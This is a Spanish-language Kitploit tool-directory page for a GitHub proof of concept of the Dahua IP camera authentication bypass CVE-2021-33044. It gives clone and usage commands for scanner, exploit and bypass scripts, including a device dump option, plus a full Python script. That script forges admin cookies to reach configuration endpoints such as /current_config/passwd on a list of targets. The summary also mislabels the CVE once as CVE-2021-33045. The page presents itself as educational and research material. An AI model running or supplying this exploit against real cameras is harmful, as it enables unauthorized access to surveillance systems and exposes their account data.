Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Camera-Dahua-Research-l-h-ng-CVE-2021-33044 — DAHUA_AUTH-BYPASS-CVE-2021-33044 | Kitploit
Herramientas/GitHubGitHub/litndat/camera-dahua-research-l-h-ng-cve-2021-33044
Autenticación y AutorizaciónSeguridad IoTAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
litndat/camera-dahua-research-l-h-ng-cve-2021-33044

Camera-Dahua-Research-l-h-ng-CVE-2021-33044

DAHUA_AUTH-BYPASS-CVE-2021-33044

Ver Repositorio
31hace 3 mesesAún no revisado

Simulación de explotación de Dahua Authentication Bypass PoC (CVE-2021-33044)

Resumen

Las cámaras IP Dahua son dispositivos IoT ampliamente utilizados en sistemas de vigilancia de seguridad. Debido a que a menudo se despliegan en redes internas o se accede a ellas desde Internet, las vulnerabilidades de seguridad en las cámaras IP pueden afectar gravemente la privacidad y la seguridad de la información.

CVE-2021-33045 es una vulnerabilidad de seguridad que existe en algunas líneas de cámaras Dahua, que permite el acceso no autorizado a recursos de configuración internos sin necesidad de autenticación válida. Esta vulnerabilidad se origina por un mecanismo de control de acceso deficiente en el firmware del dispositivo.

Información de la vulnerabilidad

ElementoContenido
CVECVE-2021-33044
TipoBypass de autenticación
GravedadCrítica (CVSS ~9.8)
AuthNo requiere autenticación
AfectaCámaras Dahua / DVR / NVR

Causa

La vulnerabilidad se origina por un diseño de autenticación inseguro en el firmware de las cámaras Dahua:

  • El servidor no verifica correctamente la sesión/token
  • Confía en los datos enviados por el cliente
  • Algunos endpoints de configuración sensibles solo verifican la existencia de una cookie, no los permisos de acceso reales

Esto permite a un atacante:

  • falsificar el proceso de autenticación
  • omitir el inicio de sesión por completo

Referencias:

  • NVD CVE-2021-33044
  • http://seclists.org/fulldisclosure/2021/Oct/13

Funcionamiento del mecanismo de omisión de autenticación

Flujo normal

→ El cliente envía una solicitud HTTP con una cookie arbitraria
→ La cámara verifica la cookie a nivel de interfaz
→ No verifica la sesión válida en el backend
→ Permite el acceso directo a los endpoints de configuración internos
→ Devuelve datos sensibles

Escenario

ArchivoPropósitoCVEs
dahua_scanner.pyDescubrimiento de red — encontrar cámaras Dahua en la subredDetección
dahua_exploit.pyEscáner Multi-CVE — verifica todas las vulnerabilidades de seguridad.Todas
dahua_auth_bypass.pyBypass de autenticación dedicado con opción --dumpCVE-2021-33044

Uso

Instalación

# Clonar el repositorio
git clone https://github.com/eagle-nett/DAHUA_AUTH-BYPASS-CVE-2021-33044.git
cd DAHUA_AUTH-BYPASS-CVE-2021-33044

pip install requests

Escaneo de red

# Escanear subred (puertos requeridos)
python dahua_scanner.py https://example.com -p 80 8080 8800

# Host único con puerto
python dahua_scanner.py https://example.com

Puertos comunes de Dahua: 80,443, 8080, 37777, 37778

Explotación de vulnerabilidad CVE

python dahua_exploit.py https://example.com -p 8081
python dahua_exploit.py https://example.com -c 2021-33044  #CVE
python dahua_exploit.py --help

Bypass de autenticación

python dahua_auth_bypass.py https://example.com -p 8080
python dahua_auth_bypass.py https://example.com  # Volcar dispositivo tras el bypass

Ejemplo

#!/usr/bin/env python3
import requests, sys
requests.packages.urllib3.disable_warnings()

def dump_accounts(ip, port=80):
    base = f"http://{ip}:{port}"
    cookies = {
        "userName": "admin",
        "userLevel": "1",
        "sessionID": "00000000"
    }
    urls = [
        "/current_config/passwd",
        "/current_config/Account1",
        "/current_config/UserMgr",
        "/current_config/accounts"
    ]

    for path in urls:
        try:
            r = requests.get(
                base + path,
                cookies=cookies,
                verify=False,
                timeout=8
            )
            if r.status_code == 200 and len(r.text) > 30:
                print(f"[+] {ip}:{port}  VULNERABLE → {path}")
                return
        except:
            pass

    print(f"[-] {ip}:{port}  safe / patched")

for line in open("targets.txt"):
    t = line.strip()
    if not t or t.startswith("#"):
        continue
    ip = t.split(":")[0]
    port = int(t.split(":")[1]) if ":" in t else 80
    dump_accounts(ip, port)

Explicación

  • El script utiliza la librería requests y desactiva intencionadamente las advertencias SSL para deshabilitar alertas SSL.

  • La función dump_accounts(ip, port=80) es la función principal encargada de verificar un dispositivo de cámara. Su función principal es:

    • Construir la URL a partir de la dirección IP y el puerto
    • Simular un estado de inicio de sesión de administrador mediante cookies
    • Enviar solicitudes a los endpoints de configuración sensibles
    • Analizar la respuesta para determinar si el dispositivo está afectado o no
  • Simulación de cookies de autenticación. La función utiliza valores de cookie como:

    • userName=admin
    • userLevel=1
    • sessionID=00000000
  • En las versiones de cámara afectadas, el backend no verifica el sessionID real, lo que hace que el sistema crea que la solicitud fue enviada desde una cuenta de administrador válida.

Bucle de procesamiento de lista de objetivos

El script lee la lista de objetivos desde un archivo de entrada y llama a la función de verificación para cada dispositivo de manera secuencial. Este enfoque permite evaluar múltiples cámaras de forma automática.

image

Proceso de desarrollo

Estos scripts han sido desarrollados basándose en:

  • Detalles de CVE publicados por NVD
  • Aviso de seguridad de Dahua
  • Referencias PoC públicas (seclists.org, packetstormsecurity)

Estado de las pruebas:

  • La lógica de omisión de autenticación se implementa según las especificaciones del CVE
  • Pruebas limitadas en dispositivos vulnerables.

Nota

Este proyecto:

  • Solo para fines educativos y de investigación
  • Ejecutar en un entorno de laboratorio personal
Descargar herramienta